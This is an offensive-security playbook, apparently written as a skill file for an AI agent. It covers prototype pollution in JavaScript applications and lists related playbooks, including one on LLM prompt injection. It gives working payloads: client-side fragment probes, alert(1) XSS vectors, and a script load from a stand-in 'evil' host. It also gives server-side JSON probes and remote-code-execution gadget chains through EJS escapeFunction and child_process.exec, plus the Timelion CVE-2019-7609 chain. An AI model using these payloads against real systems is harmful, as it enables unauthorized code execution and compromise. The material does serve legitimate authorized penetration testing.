菜单
Prototype pollution testing for JavaScript stacks. Use when user input is merged into objects (query parsers, JSON bodies, deep assign), when configuring libraries via untrusted keys, or when hunting RCE gadgets via polluted Object.prototype in Node or the browser.
Business logic vulnerability playbook. Use when reasoning about workflows, race conditions, price manipulation, coupon abuse, state machines, and multi-step authorization gaps.
LLM prompt injection playbook. Use when testing AI/LLM applications for direct injection, indirect injection via RAG/browsing, tool abuse, data exfiltration, MCP security risks, and defense bypass techniques.
Reconnaissance and methodology playbook. Use when mapping assets, discovering endpoints, fingerprinting technology, and building a structured testing plan for a new target.
SQL injection playbook. Use when input reaches SQL queries, authentication logic, sorting, filtering, reporting, or DB-specific blind and out-of-band execution paths.
SSRF playbook. Use when the server fetches URLs, resolves hostnames, imports remote content, or can be driven toward internal networks, cloud metadata, or secondary protocols.
Unauthorized access playbook for common exposed services. Use when Redis, Rsync, PHP-FPM, AJP/Ghostcat, Hadoop YARN, H2 Console, or similar management interfaces are exposed without authentication.
| name | prototype-pollution |
| description | Prototype pollution testing for JavaScript stacks. Use when user input is merged into objects (query parsers, JSON bodies, deep assign), when configuring libraries via untrusted keys, or when hunting RCE gadgets via polluted Object.prototype in Node or the browser. |
AI LOAD INSTRUCTION: Expert prototype pollution for client and server JS. Covers
__proto__vsconstructor.prototype, merge-sink detection, Express/qs-style black-box probes, and gadget chains (EJS, Timelion-class patterns, child_process/NODE_OPTIONS). Assumes you know object spread and prototype inheritance — focus is on parser behavior and post-pollution sinks.
Routing note: prioritize PP when you see deep merges, recursive assign, JSON.parse followed by Object.assign, or URL queries converted to nested objects.
#__proto__[polluted]=1
#__proto__[polluted]=polluted
#constructor[prototype][polluted]=1
When input can reflect into DOM or framework routing, pair with alert(1) / console checks to observe whether global object properties were polluted.
#__proto__[xxx]=alert(1)
{"__proto__":{"polluted":true}}
{"constructor":{"prototype":{"polluted":true}}}
After sending, check whether unrelated follow-up responses show abnormal headers/status/JSON spacing, or whether app logic reads Object.prototype.polluted (see §3 detection table).
If target code uses lodash.merge, deep-extend, hoek.applyToDefaults, or some qs/query-string configurations, raise priority.
Prototype chain: when accessing obj.key, if obj lacks own property key, lookup walks up [[Prototype]] until Object.prototype.
__proto__: many parsers treat literal key __proto__ as a magic path that attaches child properties to the prototype. Merging { "__proto__": { "x": 1 } } can be equivalent to Object.prototype.x = 1 depending on implementation and patch level.
constructor.prototype: constructor typically points to the object's constructor function; constructor.prototype is that constructor's prototype object. For plain objects this usually links to Object.prototype. Example path:
{"constructor":{"prototype":{"polluted":1}}}
This is not always equivalent to __proto__ (filtering, JSON parsing, Bun/Node differences), so test both paths.
Core issue: this is not just "one extra parameter"; in non-isolated merge logic, attacker-controlled keys point to prototype objects, giving global or shared template context malicious properties that later code reads normally, triggering gadgets.
https://app.example/page#__proto__[admin]=1
https://app.example/#__proto__[xxx]=alert(1)
If router or analytics code parses fragments into objects and then merges, pollution may occur.
constructor.prototype path#constructor[prototype][role]=admin
If the framework merges attribute names as object keys:
__proto__[src]=//evil/xss.js
Event-handler style keys (implementation-dependent):
__proto__[onerror]=alert(1)
Verification: open a fresh page without fragment and check in console whether test keys remain on Object.prototype; account for extension and DevTools interference.
The payloads below assume body/query is deeply parsed into objects by qs or similar parsers (possibly with body-parser). Observe global side effects, not only current endpoint return values.
| Payload (JSON example) | Expected observable signal |
|---|---|
{"__proto__":{"parameterLimit":1}} | Multi-parameter parsing in follow-up requests is ignored or abnormal (qs-style parameterLimit) |
{"__proto__":{"ignoreQueryPrefix":true}} | Double-question-mark prefixes like ??foo=bar are accepted or behavior changes sharply |
{"__proto__":{"allowDots":true}} | Nested keys like ?foo.bar=baz are expanded via dot notation |
{"__proto__":{"json spaces":" "}} | JSON-serialized responses gain extra spaces (JSON.stringify spacing setting polluted) |
{"__proto__":{"exposedHeaders":["foo"]}} | CORS responses include foo-related headers (if framework reads config from prototype) |
{"__proto__":{"status":510}} | Some response status changes to 510 or another abnormal code (app reads status from object) |
Operational tip: send pollution request first, then a clean request to observe persistence; connection pools and worker lifecycle affect whether impact is globally visible.
| Target / scenario | Payload or pattern | Notes |
|---|---|---|
| EJS | {"__proto__":{"client":1,"escapeFunction":"JSON.stringify; process.mainModule.require('child_process').exec('COMMAND')"}} | If template engine options like escapeFunction are read from polluted prototype, this may lead to RCE; strongly version/config dependent |
| Timelion expression chain (CVE-2019-7609) | .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("COMMAND")') | Historical chain: prototype pollution + timeline expression execution; useful to understand expression + PP combinations |
Node child_process | Pollute shell, argv0, env, NODE_OPTIONS, etc. (merged into exec/fork option objects) | Depends on whether later code calls spawn/fork and reads options from prototype chain |
| Generic constructor path | {"constructor":{"prototype":{"foo":"bar"}}} | Bypasses weak validation that filters only the __proto__ key |
Chain mindset: pollution -> dependency reads obj.settings.xxx without hasOwnProperty -> RCE / SSRF / path traversal.
| Project | Purpose |
|---|---|
| yeswehack/pp-finder | Helps locate PP-prone merge points and patterns |
| yuske/silent-spring | Research and detection around prototype-pollution surfaces |
| yuske/server-side-prototype-pollution | Server-side PP testing suite/methodology |
| BlackFan/client-side-prototype-pollution | Browser-side PP cases and payloads |
| portswigger/server-side-prototype-pollution | Burp ecosystem extension / supporting material |
| msrkp/PPScan | Scanning/verification helper |
Prioritize use on authorized targets; automated tools can cause side effects on stateful applications.
Input merged into nested object?
(query, JSON, GraphQL vars, YAML→JSON)
|
NO --------------+-------------- YES
| |
Other vuln class Parser allows __proto__ /
constructor.prototype keys?
|
NO --------------+-------------- YES
| |
Check unicode / Confirm global effect:
bypass of key names clean follow-up request
| |
+--------------+----------------+
|
v
Gadget present? (template, spawn, JSON.stringify opts, CORS)
|
NO ------------------+------------------ YES
| |
Report PP as DoS / Build minimal RCE or
logic impact high-impact PoC
| |
+---------------------+-------------------+
|
v
Client-side: fragment / DOM / third-party script
Server-side: qs/body-parser/lodash/deep-merge version audit